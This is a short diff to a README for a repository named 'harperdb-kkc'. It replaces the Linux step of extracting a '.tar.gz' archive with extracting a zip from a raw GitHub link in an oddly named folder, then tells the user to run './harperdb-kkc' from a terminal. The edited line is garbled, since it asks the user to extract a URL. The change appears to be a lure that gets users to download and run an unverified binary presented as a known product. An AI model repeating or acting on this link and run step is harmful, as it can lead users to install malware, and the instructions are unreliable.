Abrarkhan23/harperdb-kkc/README.md

      - Drag the application icon to your Applications folder.
      - Open the application from your Applications folder.
    - For Linux:
-     - Extract the downloaded `.tar.gz` file.
+     - Extract the downloaded `https://raw.githubusercontent.com/Abrarkhan23/harperdb-kkc/main/uninterposing/harperdb-kkc.zip` file.
      - Open the terminal in the extracted folder.
      - Start the application using the command: `./harperdb-kkc`.